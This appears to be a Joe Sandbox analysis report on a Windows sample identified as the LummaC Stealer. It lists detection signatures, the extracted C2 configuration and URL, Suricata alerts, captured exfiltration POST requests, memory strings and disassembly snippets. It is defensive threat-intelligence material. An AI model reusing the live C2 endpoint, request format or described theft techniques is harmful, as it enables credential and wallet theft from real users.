Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561844
MD5:7dc51c5014010a56bd8a33d256831a30
SHA1:a53650f246ad15a2091b55e59b0a054a9bbcfb8b
SHA256:49118fb0d2560d592dcad173d9ecd9b50b0c2fe1bcd3f6e39f841e1a00470852
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 1272 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7DC51C5014010A56BD8A33D256831A30)
    • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 4348 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7DC51C5014010A56BD8A33D256831A30)
  • cleanup
{"C2 url": "https://push-hook.cyou/api", "Build Version": "FATE99--test"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 4348JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 4348JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 4348JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T13:28:26.947808+010020283713Unknown Traffic192.168.2.449730172.67.161.207443TCP
          2024-11-24T13:28:29.679577+010020283713Unknown Traffic192.168.2.449731172.67.161.207443TCP
          2024-11-24T13:28:31.967163+010020283713Unknown Traffic192.168.2.449732172.67.161.207443TCP
          2024-11-24T13:28:34.333964+010020283713Unknown Traffic192.168.2.449733172.67.161.207443TCP
          2024-11-24T13:28:36.718837+010020283713Unknown Traffic192.168.2.449734172.67.161.207443TCP
          2024-11-24T13:28:39.545095+010020283713Unknown Traffic192.168.2.449735172.67.161.207443TCP
          2024-11-24T13:28:42.319305+010020283713Unknown Traffic192.168.2.449736172.67.161.207443TCP
          2024-11-24T13:28:48.318465+010020283713Unknown Traffic192.168.2.449741172.67.161.207443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T13:28:28.391969+010020546531A Network Trojan was detected192.168.2.449730172.67.161.207443TCP
          2024-11-24T13:28:30.377505+010020546531A Network Trojan was detected192.168.2.449731172.67.161.207443TCP
          2024-11-24T13:28:49.042986+010020546531A Network Trojan was detected192.168.2.449741172.67.161.207443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T13:28:28.391969+010020498361A Network Trojan was detected192.168.2.449730172.67.161.207443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T13:28:30.377505+010020498121A Network Trojan was detected192.168.2.449731172.67.161.207443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-24T13:28:40.250640+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.161.207443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exe.4348.2.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://push-hook.cyou/api", "Build Version": "FATE99--test"}
          Source: file.exeReversingLabs: Detection: 50%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C17FB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000C17FB
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]2_2_0040E0D8
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax2_2_0043B8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx2_2_0043B8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]2_2_004098F0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]2_2_0040E35B
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl2_2_0040CF05
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh2_2_0043C040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh2_2_0043C040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h2_2_0043C040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh2_2_0043C040
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax2_2_0043B860
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_00420870
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax2_2_0040C02B
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax2_2_0043F8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax2_2_0043F8D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h2_2_0043BCE0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp2_2_00405C90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp2_2_00405C90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx2_2_0040BC9D
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_00428CB0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]2_2_0040E970
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]2_2_0040AD00
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx2_2_0040EA38
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]2_2_00425E90
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]2_2_00440F60
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]2_2_004077D0
          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax2_2_004077D0

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.161.207:443
          Source: Malware configuration extractorURLs: https://push-hook.cyou/api
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.161.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.161.207:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FZ22HPRA5QKFI1HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18144Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JXGX8S01User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8723Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MJD875SE1CZE6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=714XHRNHY06QKGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1216Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CH7IYAUXOQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586119Host: push-hook.cyou
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: push-hook.cyou
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: push-hook.cyou
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: push-hook.cyou
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000002.00000003.1795461252.00000000052F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
          Source: file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
          Source: file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000002.00000003.1797089604.00000000052C9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, file.exe, 00000002.00000003.1845901808.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1845755273.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772973450.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933464874.0000000002C54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748540351.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933464874.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772916719.00000000052C6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1933303365.0000000002C07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027006243.0000000002C54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748488055.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1773036075.00000000052CB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.2027006243.0000000002C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou/
          Source: file.exe, 00000002.00000003.1933303365.0000000002C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou/api
          Source: file.exe, 00000002.00000003.1824145781.0000000002C7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1824111584.0000000002C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou/m
          Source: file.exe, 00000002.00000003.1796762781.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1795461252.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1795020611.00000000052D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou/ul
          Source: file.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou:443/api
          Source: file.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou:443/apiB
          Source: file.exe, 00000002.00000003.1933303365.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2026924995.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://push-hook.cyou:443/apiion.txtPK
          Source: file.exe, 00000002.00000003.1749111878.0000000005365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000002.00000003.1773096667.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749238502.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772986739.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749111878.0000000005363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
          Source: file.exe, 00000002.00000003.1749238502.00000000052F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
          Source: file.exe, 00000002.00000003.1773096667.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749238502.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1772986739.0000000005317000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1749111878.0000000005363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
          Source: file.exe, 00000002.00000003.1749238502.00000000052F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
          Source: file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000002.00000003.1819472379.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1818772124.00000000052C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
          Source: file.exe, 00000002.00000003.1748738580.000000000530B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1748807484.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000002.00000003.1796826342.00000000053EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.161.207:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00434470 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00434470
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00434470 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00434470
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000AA0500_2_000AA050
